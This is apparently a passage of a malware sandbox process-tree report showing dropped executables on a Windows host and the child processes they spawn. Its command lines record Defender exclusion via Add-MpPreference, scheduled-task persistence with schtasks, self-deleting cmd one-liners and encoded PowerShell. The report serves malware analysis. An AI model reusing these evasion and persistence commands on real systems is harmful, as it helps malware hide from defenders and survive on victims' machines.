    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:7244
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe"
    3⤵
    PID:7236
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"
    3⤵
    PID:3460
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"
    3⤵
    PID:3668
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"
    3⤵
    PID:6476
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe"
    3⤵
    PID:5580
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
    3⤵
    PID:6336
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe"
    3⤵
    PID:4396
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
    3⤵
    PID:6192
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe"
    3⤵
    PID:4432
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
    3⤵
    PID:5212
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:5832
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe"
    3⤵
    PID:1460
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe"
    3⤵
    PID:6260
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe"
    3⤵
    PID:7120
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:4184
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:4388
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe"
    3⤵
    PID:1136
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
    3⤵
    PID:5332
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
    3⤵
    PID:6928
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6080
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe"
    3⤵
    PID:5356
- C:\Users\Admin\AppData\Local\Temp\a\123.exe
  "C:\Users\Admin\AppData\Local\Temp\a\123.exe"
  2⤵
  PID:4828
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:7224
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe"
    3⤵
    PID:7216
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
    3⤵
    PID:7208
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
    3⤵
    PID:7200
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
    3⤵
    PID:7192
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"
    3⤵
    PID:7184
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:7176
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
    3⤵
    PID:5228
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5800
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
    3⤵
    PID:6216
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe"
    3⤵
    PID:5656
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe"
    3⤵
    PID:5296
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"
    3⤵
    PID:4400
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"
    3⤵
    PID:4572
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe"
    3⤵
    PID:6148
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe"
    3⤵
    PID:6016
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:5764
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe"
    3⤵
    PID:5484
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe"
    3⤵
    PID:5652
- C:\Users\Admin\AppData\Local\Temp\a\vbc (5).exe
  "C:\Users\Admin\AppData\Local\Temp\a\vbc (5).exe"
  2⤵
  PID:6500
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6500 -s 1636
    3⤵
    - Program crash
    PID:6352
- C:\Users\Admin\AppData\Local\Temp\a\ghjkl.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ghjkl.exe"
  2⤵
  PID:7704
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
    3⤵
    PID:4428
- - C:\Users\Admin\AppData\Local\Temp\a\ghjkl.exe
    C:\Users\Admin\AppData\Local\Temp\a\ghjkl.exe
    3⤵
    PID:7976
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 500
      4⤵
      Program crash
      PID:3984
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 480
      4⤵
      Program crash
      PID:7636
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 528
      4⤵
      Program crash
      PID:7696
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 476
      4⤵
      Program crash
      PID:5972
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 500
      4⤵
      Program crash
      PID:3672
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 484
      4⤵
      Program crash
      PID:5484
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 484
      4⤵
      Program crash
      PID:1136
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 484
      4⤵
      Program crash
      PID:8008
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 488
      4⤵
      Program crash
      PID:6092
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 508
      4⤵
      Program crash
      PID:1660
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 504
      4⤵
      Program crash
      PID:6928
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 536
      4⤵
      Program crash
      PID:2124
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 492
      4⤵
      Program crash
      PID:4148
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 492
      4⤵
      Program crash
      PID:7252
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 512
      4⤵
      Program crash
      PID:3376
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 488
      4⤵
      Program crash
      PID:1060
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 536
      4⤵
      Program crash
      PID:4488
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 496
      4⤵
      Program crash
      PID:7700
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 504
      4⤵
      Program crash
      PID:5896
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 480
      4⤵
      Program crash
      PID:7016
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 476
      4⤵
      Program crash
      PID:6884
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 492
      4⤵
      Program crash
      PID:6960
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 512
      4⤵
      Program crash
      PID:216
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 488
      4⤵
      Program crash
      PID:7524
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 536
      4⤵
      Program crash
      PID:7840
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 496
      4⤵
      Program crash
      PID:2256
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 504
      4⤵
      Program crash
      PID:3368
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 480
      4⤵
      Program crash
      PID:1932
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 476
      4⤵
      Program crash
      PID:8012
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 492
      4⤵
      Program crash
      PID:4360
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 512
      4⤵
      Program crash
      PID:3668
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 488
      4⤵
      Program crash
      PID:7128
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 536
      4⤵
      Program crash
      PID:5612
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 496
      4⤵
      Program crash
      PID:4180
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 504
      4⤵
      Program crash
      PID:4636
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 480
      4⤵
      Program crash
      PID:288
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 476
      4⤵
      Program crash
      PID:8140
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 492
      4⤵
      Program crash
      PID:7592
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 512
      4⤵
      Program crash
      PID:8168
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 488
      4⤵
      Program crash
      PID:7748
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 536
      4⤵
      Program crash
      PID:7132
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 496
      4⤵
      Program crash
      PID:6120
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 504
      4⤵
      Program crash
      PID:7772
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 480
      4⤵
      Program crash
      PID:5152
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 476
      4⤵
      Program crash
      PID:4944
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 492
      4⤵
      Program crash
      PID:7532
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 512
      4⤵
      Program crash
      PID:4160
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 488
      4⤵
      PID:5588
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 536
      4⤵
      PID:1060
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 496
      4⤵
      PID:3232
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 504
      4⤵
      PID:660
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 480
      4⤵
      PID:8
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 476
      4⤵
      PID:4048
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 492
      4⤵
      PID:2656
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 488
      4⤵
      PID:6096
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 512
      4⤵
      PID:1872
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 536
      4⤵
      PID:6644
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 484
      4⤵
      PID:7260
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 500
      4⤵
      PID:5284
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 508
      4⤵
      PID:6052
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 512
      4⤵
      PID:1900
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 488
      4⤵
      PID:6964
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 504
      4⤵
      PID:6724
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 540
      4⤵
      PID:2612
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 520
      4⤵
      PID:6552
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 492
      4⤵
      PID:4276
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 536
      4⤵
      PID:6444
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 484
      4⤵
      PID:5344
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 500
      4⤵
      PID:6976
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 512
      4⤵
      PID:2880
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 504
      4⤵
      PID:1636
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 488
      4⤵
      PID:6072
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 508
      4⤵
      PID:532
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 540
      4⤵
      PID:1648
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 484
      4⤵
      PID:5272
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 536
      4⤵
      PID:2136
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 508
      4⤵
      PID:7604
- C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe"
  2⤵
  PID:3692
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
    3⤵
    PID:7660
- - C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe
    C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe
    3⤵
    PID:3924
- - C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe
    C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe
    3⤵
    PID:2880
- - C:\Users\Admin\AppData\Local\Temp\Pbujxbvzatocktihuryyblaysccxyah.exe
    "C:\Users\Admin\AppData\Local\Temp\Pbujxbvzatocktihuryyblaysccxyah.exe"
    3⤵
    PID:2180
  - - C:\Users\Admin\AppData\Local\Temp\Pbujxbvzatocktihuryyblaysccxyah.exe
      C:\Users\Admin\AppData\Local\Temp\Pbujxbvzatocktihuryyblaysccxyah.exe
      4⤵
      PID:5028
  - - C:\Users\Admin\AppData\Local\Temp\Pbujxbvzatocktihuryyblaysccxyah.exe
      C:\Users\Admin\AppData\Local\Temp\Pbujxbvzatocktihuryyblaysccxyah.exe
      4⤵
      PID:7400
- C:\Users\Admin\AppData\Local\Temp\a\blessedjayzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\blessedjayzx.exe"
  2⤵
  PID:5308
- - C:\Users\Admin\AppData\Local\Temp\a\blessedjayzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\blessedjayzx.exe"
    3⤵
    PID:5760
- - C:\Users\Admin\AppData\Local\Temp\a\blessedjayzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\blessedjayzx.exe"
    3⤵
    PID:6896
- C:\Users\Admin\AppData\Local\Temp\a\morganzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\morganzx.exe"
  2⤵
  PID:6272
- - C:\Users\Admin\AppData\Local\Temp\a\morganzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\morganzx.exe"
    3⤵
    PID:7564
- C:\Users\Admin\AppData\Local\Temp\a\test.exe
  "C:\Users\Admin\AppData\Local\Temp\a\test.exe"
  2⤵
  PID:7624
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "test" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\test.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a\test.exe" &&START "" "C:\Users\Admin\AppData\Local\Nvidia\test.exe"
    3⤵
    PID:4464
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:5900
- C:\Users\Admin\AppData\Local\Temp\a\obi.exe
  "C:\Users\Admin\AppData\Local\Temp\a\obi.exe"
  2⤵
  PID:5108
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rqrBaKxCBepz" /XML "C:\Users\Admin\AppData\Local\Temp\tmpCD7C.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:4100
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "{path}"
    3⤵
    PID:4208
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "{path}"
    3⤵
    PID:4968
- C:\Users\Admin\AppData\Local\Temp\a\vbc (6).exe
  "C:\Users\Admin\AppData\Local\Temp\a\vbc (6).exe"
  2⤵
  PID:7684
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\vbc (6).exe"
    3⤵
    PID:5288
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NRxRXfYhgW" /XML "C:\Users\Admin\AppData\Local\Temp\tmp60B4.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:7188
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\NRxRXfYhgW.exe"
    3⤵
    PID:4144
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:7300
- C:\Users\Admin\AppData\Local\Temp\a\test (2).exe
  "C:\Users\Admin\AppData\Local\Temp\a\test (2).exe"
  2⤵
  PID:6528
- C:\Users\Admin\AppData\Local\Temp\a\fotocr23.exe
  "C:\Users\Admin\AppData\Local\Temp\a\fotocr23.exe"
  2⤵
  PID:7020
- - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\y1157289.exe
    C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\y1157289.exe
    3⤵
    PID:2580
  - - C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\m7727146.exe
      C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\m7727146.exe
      4⤵
      PID:2184
    - - C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\m7727146.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\m7727146.exe
        5⤵
        
        PID:5632
    - - C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\m7727146.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\m7727146.exe
        5⤵
        
        PID:4360
- - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\n9609544.exe
    C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\n9609544.exe
    3⤵
    PID:5048
  - - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\n9609544.exe
      C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\n9609544.exe
      4⤵
      PID:5200
- C:\Users\Admin\AppData\Local\Temp\a\foto0174.exe
  "C:\Users\Admin\AppData\Local\Temp\a\foto0174.exe"
  2⤵
  PID:7716
- - C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\x2837503.exe
    C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\x2837503.exe
    3⤵
    PID:6436
  - - C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\x8078175.exe
      C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\x8078175.exe
      4⤵
      PID:772
    - - C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\f7108021.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\f7108021.exe
        5⤵
        
        PID:8096
    - - C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\g1358459.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\g1358459.exe
        5⤵
        
        PID:6432
  - - C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\h3438475.exe
      C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\h3438475.exe
      4⤵
      PID:4684
    - - C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\h3438475.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\h3438475.exe
        5⤵
        
        PID:5988
- - C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\i7892322.exe
    C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\i7892322.exe
    3⤵
    PID:1276
  - - C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\i7892322.exe
      C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\i7892322.exe
      4⤵
      PID:5920
  - - C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\i7892322.exe
      C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\i7892322.exe
      4⤵
      PID:2076
- C:\Users\Admin\AppData\Local\Temp\a\vbc (7).exe
  "C:\Users\Admin\AppData\Local\Temp\a\vbc (7).exe"
  2⤵
  PID:2012
- C:\Users\Admin\AppData\Local\Temp\a\SCMB.exe
  "C:\Users\Admin\AppData\Local\Temp\a\SCMB.exe"
  2⤵
  PID:5928
- C:\Users\Admin\AppData\Local\Temp\a\bebra.exe
  "C:\Users\Admin\AppData\Local\Temp\a\bebra.exe"
  2⤵
  PID:7756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\bebra.exe
    3⤵
    PID:8020
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 0
      4⤵
      PID:7452
- C:\Users\Admin\AppData\Local\Temp\a\loaderx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\loaderx.exe"
  2⤵
  PID:7172
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANAA1AA==
    3⤵
    PID:7864
  - - C:\Windows\system32\wermgr.exe
